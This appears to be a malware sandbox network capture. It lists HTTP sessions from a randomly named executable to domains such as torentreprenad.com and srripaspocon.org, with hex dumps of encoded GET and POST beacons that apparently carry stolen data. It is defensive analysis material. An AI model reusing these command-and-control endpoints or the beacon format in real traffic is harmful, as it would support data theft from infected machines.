9d=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo91rUiCZrrzqMgrp4ltLVZMa50azUpP669j91VqVZeSE9hvSxv5n/tqiRyaRnsT0XwuGw9qdSHIaCoJQZNMHyx98+/New6fcUEb10JB1Mgejhs8E0dup5EJ4Fi47iQW04MooN2bOvkoAFOVSzmfi3c27hb7ABQMWf7Ql5lZBk7/qPLuRHom5bVBqlEYkUlasZKzdQzN2Bj9RNx9ZgAyXb/ZEV6/oWCJ1p1ZlG7awzvvWk6Sm7s+eMR+DQvqNVvodKIrsI4+Fa4rcQMVRkjQqhtH4Kd5+6rzU1B5qUZpBeuzhWeS09lgsmZtvvjg/X/x03d+nSRzPAlkrv4kbsCrhTlXxsM5gc7pfQ1wMe1vt8gy1I2UZ9PkyNeW9zFFFnZFG+qJQm2rqZbdegRMychQVR9xz3ZqLeplvJrWwTXbW6NV0HQxzNvF3Pn1qcq7NKyFq3BnxO8hxaOTqtuXQ8+AwcYXD7w7/tVNet9+gA2EsUwYPgz1XncFVDQdz7zQuMiUAdf+X7H+k0Ly23LADnsD+kMJ1FLlejMuePgsmGJ6rjxBqNOE8wqrLyMqGPfLZckbllowBeAkWQDLaOlXcHcPUT1ae1PUnVgPQ0X1RsnPMBNEte14JxPIudL1HkHXdTgqOLtoox84OSKMrO4642FOPoyIT6ZW/nwqs0hMkIDLMO7Zy9ij8k6TbIwIMmfxFr/mZhe1W/EWQp6wXc5VyRo5rytZcXCrxOMg66YS8sl3mpm21JMOryhWLG4uvkrsPEyZ5HdztzjUOgMEdoKR0vlURWZqPanbw0yvbDepUAKlN6OM6em8X7RtxO8bvkTMguxbZ8LjYsd6iwYmrFdsafECYCvc3lYA4CidCq0jWyKYwWMFnumz8/DtMoKRS17ofJ+VKKrJbluLE6N4qC8e7K0EZb3QLoXUSqV0JwtVpHgRfOdCrKZRtdx4HZNxhDMeoS4OjVfG+Iwhk7 [TRUNCATED]
Jun 5, 2024 18:29:01.627319098 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Wed, 05 Jun 2024 16:29:01 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 5, 2024 18:29:01.627338886 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
Jun 5, 2024 18:29:01.627494097 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49739	15.204.0.108	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:03.428524971 CEST	451	OUT	GET /egr4/?9d=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC1S/tz9V2xJeiTRy2uMqSR06k3ZbbYlILY5knN9gwwCUqzf9nwI+FPnn/&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:29:04.128642082 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Wed, 05 Jun 2024 16:29:04 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 5, 2024 18:29:04.128660917 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49740	194.9.94.86	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:17.382042885 CEST	720	OUT	POST /r45o/ HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.torentreprenad.com Referer: http://www.torentreprenad.com/r45o/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 38 69 48 52 36 66 39 50 6c 70 65 6d 57 6a 6d 4a 5a 4f 64 35 50 71 59 53 63 31 35 6d 36 6f 31 55 72 63 50 50 6f 65 31 38 6d 71 76 73 41 41 47 6d 6b 69 2f 79 41 69 76 6c 39 48 58 53 6d 50 76 41 46 6c 50 5a 52 38 38 79 73 33 66 59 41 36 44 79 41 4f 6a 53 34 6e 56 66 68 6a 57 65 63 52 6c 4e 58 2f 32 48 39 59 49 35 59 63 74 32 67 72 6d 75 2b 69 34 6c 37 38 6d 2b 54 37 35 4c 78 45 6d 59 62 74 41 73 35 66 33 4a 36 57 6c 6a 73 38 72 42 58 4f 2b 46 77 6a 48 57 65 68 57 56 58 46 46 30 45 35 76 38 78 58 79 48 57 49 35 59 6a 6a 69 39 47 36 58 2f 6c 31 71 63 44 42 69 77 4c 49 45 65 4d 5a 56 4d 51 77 3d 3d Data Ascii: 9d=txGZWh/o/5868iHR6f9PlpemWjmJZOd5PqYSc15m6o1UrcPPoe18mqvsAAGmki/yAivl9HXSmPvAFlPZR88ys3fYA6DyAOjS4nVfhjWecRlNX/2H9YI5Yct2grmu+i4l78m+T75LxEmYbtAs5f3J6Wljs8rBXO+FwjHWehWVXFF0E5v8xXyHWI5Yjji9G6X/l1qcDBiwLIEeMZVMQw==
Jun 5, 2024 18:29:18.210161924 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jun 2024 16:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 5, 2024 18:29:18.210196972 CEST	212	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
Jun 5, 2024 18:29:18.210216999 CEST	1236	IN	Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
Jun 5, 2024 18:29:18.210236073 CEST	1236	IN	Data Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
Jun 5, 2024 18:29:18.210253954 CEST	1236	IN	Data Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
Jun 5, 2024 18:29:18.210275888 CEST	636	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jun 5, 2024 18:29:18.210290909 CEST	30	IN	Data Raw: 6e 74 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: nt --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49741	194.9.94.86	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:19.910940886 CEST	740	OUT	POST /r45o/ HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.torentreprenad.com Referer: http://www.torentreprenad.com/r45o/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 74 79 62 52 70 2f 42 50 6a 4a 65 68 4b 7a 6d 4a 58 75 64 39 50 71 55 53 63 33 56 32 36 39 46 55 79 2b 48 50 70 63 52 38 68 71 76 73 49 67 47 6a 38 43 2f 37 41 69 7a 58 39 43 76 53 6d 50 37 41 46 6e 58 5a 53 4c 6f 78 74 6e 66 57 4e 61 44 77 4f 75 6a 53 34 6e 56 66 68 69 79 67 63 53 56 4e 58 73 75 48 79 5a 49 32 47 4d 74 33 6e 72 6d 75 6f 69 34 68 37 38 6d 58 54 37 4a 68 78 43 71 59 62 76 6f 73 34 4f 33 49 68 47 6b 4a 79 4d 71 5a 58 66 4b 42 78 77 66 47 59 6a 61 30 4a 6d 42 4d 4d 76 79 65 72 31 2b 72 49 5a 42 6a 6e 68 47 4c 52 63 4b 4b 6e 30 75 45 4f 6a 57 52 55 2f 68 30 42 4c 30 49 47 4d 75 39 75 44 49 33 7a 6e 7a 36 49 6b 52 37 59 6e 55 4a 6f 42 41 3d Data Ascii: 9d=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V269FUy+HPpcR8hqvsIgGj8C/7AizX9CvSmP7AFnXZSLoxtnfWNaDwOujS4nVfhiygcSVNXsuHyZI2GMt3nrmuoi4h78mXT7JhxCqYbvos4O3IhGkJyMqZXfKBxwfGYja0JmBMMvyer1+rIZBjnhGLRcKKn0uEOjWRU/h0BL0IGMu9uDI3znz6IkR7YnUJoBA=
Jun 5, 2024 18:29:20.773403883 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jun 2024 16:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 5, 2024 18:29:20.773430109 CEST	212	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
Jun 5, 2024 18:29:20.773446083 CEST	1236	IN	Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
Jun 5, 2024 18:29:20.773483038 CEST	1236	IN	Data Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
Jun 5, 2024 18:29:20.773490906 CEST	1236	IN	Data Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
Jun 5, 2024 18:29:20.773660898 CEST	666	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49742	194.9.94.86	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:22.445214987 CEST	1753	OUT	POST /r45o/ HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.torentreprenad.com Referer: http://www.torentreprenad.com/r45o/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 74 79 62 52 70 2f 42 50 6a 4a 65 68 4b 7a 6d 4a 58 75 64 39 50 71 55 53 63 33 56 32 36 38 52 55 79 73 2f 50 6f 39 52 38 67 71 76 73 47 41 47 69 38 43 2b 35 41 69 36 63 39 43 72 43 6d 4e 44 41 44 45 66 5a 58 2b 55 78 34 33 66 57 45 36 44 78 41 4f 6a 39 34 6e 46 62 68 6a 43 67 63 53 56 4e 58 75 61 48 31 49 49 32 45 4d 74 32 67 72 6d 69 2b 69 34 4a 37 38 2b 74 54 36 39 62 77 79 4b 59 61 50 34 73 30 63 76 49 38 57 6c 76 7a 4d 71 4b 58 66 58 66 78 7a 37 77 59 6d 6d 4b 4a 6b 42 4d 64 37 48 58 2f 47 4f 4a 4c 59 78 51 74 77 75 34 47 74 4f 61 67 6d 79 6d 4b 51 2f 78 53 66 74 4c 4b 64 59 6d 41 38 2b 67 37 69 4d 